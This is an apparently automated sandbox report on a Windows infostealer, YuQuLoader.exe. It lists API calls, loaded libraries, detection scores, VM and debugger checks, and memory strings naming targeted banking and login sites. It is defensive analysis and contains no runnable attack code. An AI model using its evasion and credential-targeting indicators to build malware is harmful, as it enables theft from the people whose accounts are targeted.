                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE47302_2_00AE4730
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE9F002_2_00AE9F00
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE57002_2_00AE5700
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9AF102_2_00A9AF10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A97F102_2_00A97F10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00ACB7102_2_00ACB710
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AD5F102_2_00AD5F10
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AE3F602_2_00AE3F60
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AB47702_2_00AB4770
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEE7702_2_00AEE770
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00A9F7502_2_00A9F750
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEF7502_2_00AEF750
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00AEFF502_2_00AEFF50
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: String function: 0041B930 appears 104 times
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: String function: 00B05B5C appears 38 times
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: String function: 00AFD8F0 appears 88 times
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: String function: 00B0A904 appears 32 times
Source: C:\Users\user\Desktop\YuQuLoader.exe | Code function: String function: 0040B230 appears 40 times
Source: C:\Users\user\Desktop\YuQuLoader.exe | Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8608 -s 404
Source: YuQuLoader.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: YuQuLoader.exe | Static PE information: Section: .bss ZLIB complexity 1.0003241237482117
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/6@4/3
                Source: C:\Users\user\Desktop\YuQuLoader.exeCode function: 2_2_00443F90 CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_00443F90
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8616:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess8608
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\5fb9e87b-3f8a-4f3e-817e-adfc1cc5517dJump to behavior
                Source: YuQuLoader.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\YuQuLoader.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: YuQuLoader.exe, 00000002.00000003.1452699167.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1453921226.000000000167D000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1481847200.0000000003CDA000.00000004.00000800.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1482246336.0000000003CBC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: YuQuLoader.exeVirustotal: Detection: 41%
                Source: YuQuLoader.exeReversingLabs: Detection: 39%
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile read: C:\Users\user\Desktop\YuQuLoader.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\YuQuLoader.exe "C:\Users\user\Desktop\YuQuLoader.exe"
                Source: C:\Users\user\Desktop\YuQuLoader.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\YuQuLoader.exeProcess created: C:\Users\user\Desktop\YuQuLoader.exe "C:\Users\user\Desktop\YuQuLoader.exe"
                Source: C:\Users\user\Desktop\YuQuLoader.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8608 -s 404
                Source: C:\Users\user\Desktop\YuQuLoader.exeProcess created: C:\Users\user\Desktop\YuQuLoader.exe "C:\Users\user\Desktop\YuQuLoader.exe"Jump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: webio.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: fwpuclnt.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: schannel.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: mskeyprotect.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: ntasn1.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: ncrypt.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: ncryptsslp.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: msasn1.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: cryptsp.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: rsaenh.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: cryptbase.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: gpapi.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: dpapi.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: wbemcomn.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: amsi.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: profapi.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: version.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Section loaded: ondemandconnroutehelper.dll
                Source: YuQuLoader.exe; Static file information: File size 1362432 > 1048576
                Source: YuQuLoader.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 0_2_00AFDAAA push ecx; ret 0_2_00AFDABD
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 2_2_0045446E push cs; ret 2_2_004544B8
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 2_2_0044F4CF push esp; retf 2_2_0044F4D2
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 2_2_00454666 push 9DE8EE2Fh; iretd 2_2_0045468D
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 2_2_0044F7BD push ds; retf 2_2_0044F83A
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 2_2_00AFDAAA push ecx; ret 2_2_00AFDABD
                Source: YuQuLoader.exe; Static PE information: section name: .text entropy: 7.096196420710893
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX
                Source: C:\Windows\SysWOW64\WerFault.exe; Process information set: NOOPENFILEERRORBOX

                Malware Analysis System Evasion

                barindex
                Source: C:\Users\user\Desktop\YuQuLoader.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                Source: C:\Users\user\Desktop\YuQuLoader.exe; System information queried: FirmwareTableInformation
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Window / User API: threadDelayed 5724
                Source: C:\Users\user\Desktop\YuQuLoader.exe TID: 8708; Thread sleep time: -240000s >= -30000s
                Source: C:\Users\user\Desktop\YuQuLoader.exe TID: 8160; Thread sleep count: 5724 > 30
                Source: C:\Users\user\Desktop\YuQuLoader.exe; WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Last function: Thread delayed
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Last function: Thread delayed
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 0_2_00B0F86F FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00B0F86F
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 0_2_00B0F7BE FindFirstFileExW,0_2_00B0F7BE
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 2_2_00B0F86F FindFirstFileExW,FindNextFileW,FindClose,FindClose,2_2_00B0F86F
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 2_2_00B0F7BE FindFirstFileExW,2_2_00B0F7BE
                Source: Amcache.hve.5.dr; Binary or memory string: VMware
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D0D000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: - GDCDYNVMware20,11696428655p
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: global block list test formVMware20,11696428655
                Source: Amcache.hve.5.dr; Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: YuQuLoader.exe, 00000002.00000003.1681524125.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.2281775976.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.2282475400.00000000015E5000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589161023.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1557429661.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1557228002.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1651675961.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000002.2618247234.00000000015E6000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1400529592.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589446063.00000000015DB000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
                Source: Amcache.hve.5.dr; Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                Source: Amcache.hve.5.dr; Binary or memory string: vmci.sys
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: AMC password management pageVMware20,11696428655
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: tasks.office.comVMware20,11696428655o
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: turbotax.intuit.comVMware20,11696428655t
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: interactivebrokers.comVMware20,11696428655
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                Source: Amcache.hve.5.dr; Binary or memory string: VMware20,1
                Source: Amcache.hve.5.dr; Binary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.5.dr; Binary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.5.dr; Binary or memory string: VMware Virtual disk SCSI Disk Device
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
                Source: Amcache.hve.5.dr; Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.5.dr; Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.5.dr; Binary or memory string: VMware PCI VMCI Bus Device
                Source: Amcache.hve.5.dr; Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.24224532.B64.2408191502,BiosReleaseDate:08/19/2024,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: Amcache.hve.5.dr; Binary or memory string: VMware VMCI Bus Device
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: bankofamerica.comVMware20,11696428655x
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
                Source: Amcache.hve.5.dr; Binary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: YuQuLoader.exe, 00000002.00000003.1681524125.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.2281775976.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.2282475400.00000000015E5000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589161023.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1557429661.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1557228002.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1651675961.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000002.2618247234.00000000015E6000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1400529592.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1589446063.00000000015DB000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW8
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
                Source: Amcache.hve.5.dr; Binary or memory string: VMware Virtual USB Mouse
                Source: Amcache.hve.5.dr; Binary or memory string: vmci.syshbin
                Source: Amcache.hve.5.dr; Binary or memory string: VMware, Inc.
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: discord.comVMware20,11696428655f
                Source: Amcache.hve.5.dr; Binary or memory string: VMware20,1hbin@
                Source: Amcache.hve.5.dr; Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: Amcache.hve.5.dr; Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
                Source: Amcache.hve.5.dr; Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
                Source: Amcache.hve.5.dr; Binary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: outlook.office365.comVMware20,11696428655t
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                Source: Amcache.hve.5.dr; Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: outlook.office.comVMware20,11696428655s
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: ms.portal.azure.comVMware20,11696428655
                Source: Amcache.hve.5.dr; Binary or memory string: VMware Virtual RAMX
                Source: Amcache.hve.5.dr; Binary or memory string: VMware-42 27 d9 2e dc 89 72 dd-92 e8 86 9f a5 a6 64 93
                Source: Amcache.hve.5.dr; Binary or memory string: vmci.syshbin`
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                Source: Amcache.hve.5.dr; Binary or memory string: \driver\vmci,\driver\pci
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: dev.azure.comVMware20,11696428655j
                Source: Amcache.hve.5.dr; Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
                Source: Amcache.hve.5.dr; Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: YuQuLoader.exe, 00000002.00000003.1482035892.0000000003D00000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                Source: C:\Users\user\Desktop\YuQuLoader.exe; API call chain: ExitProcess graph end node
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Process information queried: ProcessInformation
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Process queried: DebugPort
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Process queried: DebugPort
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 2_2_00449980 LdrInitializeThunk,2_2_00449980
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 0_2_00B058AE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B058AE
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 0_2_00B261B4 mov edi, dword ptr fs:[00000030h]0_2_00B261B4
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 0_2_00B0B1FC GetProcessHeap,0_2_00B0B1FC
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 0_2_00B058AE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00B058AE
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 0_2_00AFD3C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00AFD3C0
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 0_2_00AFD77C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00AFD77C
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 0_2_00AFD770 SetUnhandledExceptionFilter,0_2_00AFD770
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 2_2_00B058AE IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00B058AE
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 2_2_00AFD3C0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00AFD3C0
                Source: C:\Users\user\Desktop\YuQuLoader.exe; Code function: 2_2_00AFD77C IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00AFD77C

                HIPS / PFW / Operating System Protection Evasion

                barindex
